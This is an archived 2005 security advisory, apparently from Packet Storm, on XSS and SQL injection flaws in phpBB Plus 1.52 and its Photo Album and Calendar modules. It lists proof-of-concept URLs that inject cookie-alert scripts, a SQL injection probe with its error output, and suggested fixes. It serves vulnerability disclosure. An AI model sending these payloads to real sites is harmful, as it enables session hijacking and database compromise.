Search...

dc_phpbb_xss_sql.txt

2005-04-19T00:00:00

ID PACKETSTORM:37205
Type packetstorm
Reporter Diabolic Crab
Modified 2005-04-19T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
  
------=_NextPart_000_0009_01C5406C.5DF1F1F0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =  
Learn more at http://www.digitalparadox.org/services.ah  
  
Severity: Medium  
Title: Multiple Sql injection and XSS vulnerabilities in phpBB Plus =  
v.1.52 and below and some of its modules.  
Date: 13/04/2005  
  
Vendor: PhpBB2 Plus and Smartor  
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/  
Summary: There are, multiple sql injection and xss vulnerabilities in =  
phpbb plus v.1.52 and below and some of its modules..  
  
Proof of Concept Exploits:=20  
  
PhpBB Plus v.1.52 and below  
http://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert=  
(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(doc=  
ument.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%=  
3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217  
Pops cookie  
  
  
http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cooki=  
e)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217  
Pops cookie  
  
  
http://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Eal=  
ert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(document.c=  
ookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59  
Pops cookie  
  
  
http://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert=  
(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ea=  
lert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Photo Album v2.0.53  
  
http://localhost/album_search.php?mode=3D'SQL_INJECTION&search=3Ddcrab  
SQL INJECTION  
  
DEBUG MODE  
  
SQL Error : 1064 You have an error in your SQL syntax. Check the manual =  
that corresponds to your MySQL server version for the right syntax to =  
use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR =  
p.pic_c  
  
SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, =  
p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM =  
phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND =  
LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =  
=3D 0 AND p.pic_approval =3D 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY =  
p.pic_time DESC  
  
Line : 105  
File : album_search.php  
  
  
http://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3E=  
alert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscr=  
ipt%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Calender MOD  
http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D&start=3D'"=  
&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp%3bsid=3Dd32836b8178e5d62b2b1=  
73ed177e4b0d  
Pops cookie  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =  
my soon to come out book on Secure coding with php.  
------=_NextPart_000_0009_01C5406C.5DF1F1F0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;  
&lt;HTML&gt;&lt;HEAD&gt;  
&lt;META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1"&gt;  
&lt;META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR&gt;  
&lt;STYLE&gt;&lt;/STYLE&gt;  
&lt;/HEAD&gt;  
&lt;BODY bgColor=3D#ffffff&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Dcrab 's Security Advisory&lt;BR&gt;[Hsc =  
Security Group]=20  
&lt;A =  
href=3D"http://www.hackerscenter.com/"&gt;http://www.hackerscenter.com/&lt;/A&gt;&lt;=  
BR&gt;[dP=20  
Security] &lt;A=20  
href=3D"http://digitalparadox.org/"&gt;http://digitalparadox.org/&lt;/A&gt;&lt;/FONT&gt;=  
&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc. Learn more at &lt;A=20  
href=3D"http://www.digitalparadox.org/services.ah"&gt;http://www.digitalpara=  
dox.org/services.ah&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Severity: Medium&lt;BR&gt;Title: Multiple Sql =  
injection=20  
and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its=20  
modules.&lt;BR&gt;Date: 13/04/2005&lt;/FONT&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Vendor: PhpBB2 Plus and =  
Smartor&lt;BR&gt;Vendor Website:=20  
&lt;A href=3D"http://www.phpbb2.de"&gt;http://www.phpbb2.de&lt;/A&gt;, &lt;A=20  
href=3D"http://smartor.is-root.com/"&gt;http://smartor.is-root.com/&lt;/A&gt;&lt;BR&gt;S=  
ummary:=20  
There are, multiple sql injection and xss vulnerabilities in phpbb plus =  
v.1.52=20  
and below and some of its modules..&lt;/FONT&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Proof of Concept Exploits: =  
&lt;/FONT&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;PhpBB Plus v.1.52 and below&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Csc=  
ript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/groupcp.php?=  
g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri=  
pt%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/FONT&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;&lt;FONT face=3DArial size=3D2&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript=  
%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/index.php?c=3D1&=  
amp;amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&lt;/A=  
&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.=  
cookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217"&gt;ht=  
tp://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C=  
/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(docume=  
nt.cookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217"=  
&gt;http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cook=  
ie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217&lt;/A&gt;&lt;BR&gt;=  
Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3=  
Cscript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/portal.ph=  
p?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3=  
C/script%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(do=  
cument.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67c=  
f59"&gt;http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(docum=  
ent.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59=  
&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Csc=  
ript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/viewforum.ph=  
p?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri=  
pt%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%=  
3Cscript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/viewtopi=  
c.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)=  
%3C/script%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;Photo Album v2.0.53&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;A=20  
href=3D"http://localhost/album_search.php?mode=3D'SQL_INJECTION&searc=  
h=3Ddcrab"&gt;http://localhost/album_search.php?mode=3D'SQL_INJECTION&se=  
arch=3Ddcrab&lt;/A&gt;&lt;BR&gt;SQL=20  
INJECTION&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;DEBUG MODE&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;SQL Error : 1064 You have an error in your SQL syntax. Check the =  
manual=20  
that corresponds to your MySQL server version for the right syntax to =  
use near=20  
'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_c&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, =  
p.pic_username,=20  
p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM =  
phpbb_album=20  
AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND LIKE =  
'%\'SQL_INJECTION%'=20  
AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =3D 0 AND p.pic_approval =  
=3D 1 AND LIKE=20  
'%\'SQL_INJECTION%' ORDER BY p.pic_time DESC&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;Line : 105&lt;BR&gt;File : album_search.php&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E=  
%3Cscript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/album_c=  
at.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cooki=  
e)%3C/script%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'=  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"&gt;http://localhost/a=  
lbum_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(do=  
cument.cookie)%3C/script%3E&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;Calender MOD&lt;BR&gt;&lt;A=20  
href=3D"http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D=  
&start=3D'"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp%3bsi=  
d=3Dd32836b8178e5d62b2b173ed177e4b0d"&gt;http://localhost/calendar_scheduler=  
.php?d=3D1113174000&mode=3D&start=3D'"&gt;&lt;script&gt;alert(doc=  
ument.cookie)&lt;/script&gt;&amp%3bsid=3Dd32836b8178e5d62b2b173ed177e=  
4b0d&lt;/A&gt;&lt;BR&gt;Pops=20  
cookie&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;&lt;BR&gt;Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;Keep your self updated, Rss feed at: &lt;A=20  
href=3D"http://digitalparadox.org/rss.ah"&gt;http://digitalparadox.org/rss.a=  
h&lt;/A&gt;&lt;/DIV&gt;  
&lt;DIV&gt;&nbsp;&lt;/DIV&gt;  
&lt;DIV&gt;Author: &lt;BR&gt;These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, &lt;A=20  
href=3D"http://www.hackerscenter.com"&gt;http://www.hackerscenter.com&lt;/A&gt; =  
or &lt;A=20  
href=3D"http://digitalparadox.org/"&gt;http://digitalparadox.org/&lt;/A&gt;. =  
Lookout for my=20  
soon to come out book on Secure coding with =  
php.&lt;/DIV&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;  
  
------=_NextPart_000_0009_01C5406C.5DF1F1F0--  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/37205/dc_phpbb_xss_sql.txt", "sourceData": "`This is a multi-part message in MIME format. \n \n------=_NextPart_000_0009_01C5406C.5DF1F1F0 \nContent-Type: text/plain; \ncharset=\"iso-8859-1\" \nContent-Transfer-Encoding: quoted-printable \n \nDcrab 's Security Advisory \n[Hsc Security Group] http://www.hackerscenter.com/ \n[dP Security] http://digitalparadox.org/ \n \nGet Dcrab's Services to audit your Web servers, scripts, networks, etc. = \nLearn more at http://www.digitalparadox.org/services.ah \n \nSeverity: Medium \nTitle: Multiple Sql injection and XSS vulnerabilities in phpBB Plus = \nv.1.52 and below and some of its modules. \nDate: 13/04/2005 \n \nVendor: PhpBB2 Plus and Smartor \nVendor Website: http://www.phpbb2.de, http://smartor.is-root.com/ \nSummary: There are, multiple sql injection and xss vulnerabilities in = \nphpbb plus v.1.52 and below and some of its modules.. \n \nProof of Concept Exploits:=20 \n \nPhpBB Plus v.1.52 and below \nhttp://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert= \n(document.cookie)%3C/script%3E \nPops cookie \n \n \nhttp://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(doc= \nument.cookie)%3C/script%3E \nPops cookie \n \n \nhttp://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%= \n3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217 \nPops cookie \n \n \nhttp://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cooki= \ne)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217 \nPops cookie \n \n \nhttp://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Eal= \nert(document.cookie)%3C/script%3E \nPops cookie \n \n \nhttp://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(document.c= \nookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59 \nPops cookie \n \n \nhttp://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert= \n(document.cookie)%3C/script%3E \nPops cookie \n \n \nhttp://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ea= \nlert(document.cookie)%3C/script%3E \nPops cookie \n \n \nPhoto Album v2.0.53 \n \nhttp://localhost/album_search.php?mode=3D'SQL_INJECTION&search=3Ddcrab \nSQL INJECTION \n \nDEBUG MODE \n \nSQL Error : 1064 You have an error in your SQL syntax. Check the manual = \nthat corresponds to your MySQL server version for the right syntax to = \nuse near 'LIKE '%\\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR = \np.pic_c \n \nSELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, = \np.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM = \nphpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND = \nLIKE '%\\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id = \n=3D 0 AND p.pic_approval =3D 1 AND LIKE '%\\'SQL_INJECTION%' ORDER BY = \np.pic_time DESC \n \nLine : 105 \nFile : album_search.php \n \n \nhttp://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3E= \nalert(document.cookie)%3C/script%3E \nPops cookie \n \n \nhttp://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscr= \nipt%3Ealert(document.cookie)%3C/script%3E \nPops cookie \n \n \nCalender MOD \nhttp://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D&start=3D'\"= \n><script>alert(document.cookie)</script>&amp%3bsid=3Dd32836b8178e5d62b2b1= \n73ed177e4b0d \nPops cookie \n \n \nPossible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = \nmysql_real_escape_string() and other functions for input validation = \nbefore passing user input to the mysql database, or before echoing data = \non the screen, would solve these problems. \n \nKeep your self updated, Rss feed at: http://digitalparadox.org/rss.ah \n \nAuthor:=20 \nThese vulnerabilties have been found and released by Diabolic Crab, = \nEmail: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = \ncontact me regarding these vulnerabilities. You can find me at, = \nhttp://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = \nmy soon to come out book on Secure coding with php. \n------=_NextPart_000_0009_01C5406C.5DF1F1F0 \nContent-Type: text/html; \ncharset=\"iso-8859-1\" \nContent-Transfer-Encoding: quoted-printable \n \n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"> \n<HTML><HEAD> \n<META http-equiv=3DContent-Type content=3D\"text/html; = \ncharset=3Diso-8859-1\"> \n<META content=3D\"MSHTML 6.00.2900.2604\" name=3DGENERATOR> \n<STYLE></STYLE> \n</HEAD> \n<BODY bgColor=3D#ffffff> \n<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc = \nSecurity Group]=20 \n<A = \nhref=3D\"http://www.hackerscenter.com/\">http://www.hackerscenter.com/</A><= \nBR>[dP=20 \nSecurity] <A=20 \nhref=3D\"http://digitalparadox.org/\">http://digitalparadox.org/</A></FONT>= \n</DIV> \n<DIV> </DIV> \n<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web = \nservers,=20 \nscripts, networks, etc. Learn more at <A=20 \nhref=3D\"http://www.digitalparadox.org/services.ah\">http://www.digitalpara= \ndox.org/services.ah</A></FONT></DIV> \n<DIV> </DIV> \n<DIV><FONT face=3DArial size=3D2>Severity: Medium<BR>Title: Multiple Sql = \ninjection=20 \nand XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its=20 \nmodules.<BR>Date: 13/04/2005</FONT></DIV> \n<DIV> </DIV> \n<DIV><FONT face=3DArial size=3D2>Vendor: PhpBB2 Plus and = \nSmartor<BR>Vendor Website:=20 \n<A href=3D\"http://www.phpbb2.de\">http://www.phpbb2.de</A>, <A=20 \nhref=3D\"http://smartor.is-root.com/\">http://smartor.is-root.com/</A><BR>S= \nummary:=20 \nThere are, multiple sql injection and xss vulnerabilities in phpbb plus = \nv.1.52=20 \nand below and some of its modules..</FONT></DIV> \n<DIV> </DIV> \n<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: = \n</FONT></DIV> \n<DIV> </DIV> \n<DIV><FONT face=3DArial size=3D2>PhpBB Plus v.1.52 and below<BR><A=20 \nhref=3D\"http://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Csc= \nript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/groupcp.php?= \ng=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri= \npt%3E</A><BR>Pops=20 \ncookie</FONT></DIV> \n<DIV> </DIV><FONT face=3DArial size=3D2> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript= \n%3Ealert(document.cookie)%3C/script%3E\">http://localhost/index.php?c=3D1&= \namp;amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A= \n><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.= \ncookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217\">ht= \ntp://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C= \n/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(docume= \nnt.cookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217\"= \n>http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cook= \nie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217</A><BR>= \nPops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3= \nCscript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/portal.ph= \np?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3= \nC/script%3E</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(do= \ncument.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67c= \nf59\">http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(docum= \nent.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59= \n</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Csc= \nript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/viewforum.ph= \np?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri= \npt%3E</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%= \n3Cscript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/viewtopi= \nc.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)= \n%3C/script%3E</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR>Photo Album v2.0.53</DIV> \n<DIV> </DIV> \n<DIV><A=20 \nhref=3D\"http://localhost/album_search.php?mode=3D'SQL_INJECTION&searc= \nh=3Ddcrab\">http://localhost/album_search.php?mode=3D'SQL_INJECTION&se= \narch=3Ddcrab</A><BR>SQL=20 \nINJECTION</DIV> \n<DIV> </DIV> \n<DIV>DEBUG MODE</DIV> \n<DIV> </DIV> \n<DIV>SQL Error : 1064 You have an error in your SQL syntax. Check the = \nmanual=20 \nthat corresponds to your MySQL server version for the right syntax to = \nuse near=20 \n'LIKE '%\\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_c</DIV> \n<DIV> </DIV> \n<DIV>SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, = \np.pic_username,=20 \np.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM = \nphpbb_album=20 \nAS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND LIKE = \n'%\\'SQL_INJECTION%'=20 \nAND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =3D 0 AND p.pic_approval = \n=3D 1 AND LIKE=20 \n'%\\'SQL_INJECTION%' ORDER BY p.pic_time DESC</DIV> \n<DIV> </DIV> \n<DIV>Line : 105<BR>File : album_search.php</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E= \n%3Cscript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/album_c= \nat.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cooki= \ne)%3C/script%3E</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR><A=20 \nhref=3D\"http://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'= \n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\">http://localhost/a= \nlbum_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(do= \ncument.cookie)%3C/script%3E</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR>Calender MOD<BR><A=20 \nhref=3D\"http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D= \n&start=3D'\"><script>alert(document.cookie)</script>&amp%3bsi= \nd=3Dd32836b8178e5d62b2b173ed177e4b0d\">http://localhost/calendar_scheduler= \n.php?d=3D1113174000&mode=3D&start=3D'\"><script>alert(doc= \nument.cookie)</script>&amp%3bsid=3Dd32836b8178e5d62b2b173ed177e= \n4b0d</A><BR>Pops=20 \ncookie</DIV> \n<DIV> </DIV> \n<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20 \nmysql_escape_string(), mysql_real_escape_string() and other functions = \nfor input=20 \nvalidation before passing user input to the mysql database, or before = \nechoing=20 \ndata on the screen, would solve these problems.</DIV> \n<DIV> </DIV> \n<DIV>Keep your self updated, Rss feed at: <A=20 \nhref=3D\"http://digitalparadox.org/rss.ah\">http://digitalparadox.org/rss.a= \nh</A></DIV> \n<DIV> </DIV> \n<DIV>Author: <BR>These vulnerabilties have been found and released by = \nDiabolic=20 \nCrab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = \nfree to=20 \ncontact me regarding these vulnerabilities. You can find me at, <A=20 \nhref=3D\"http://www.hackerscenter.com\">http://www.hackerscenter.com</A> = \nor <A=20 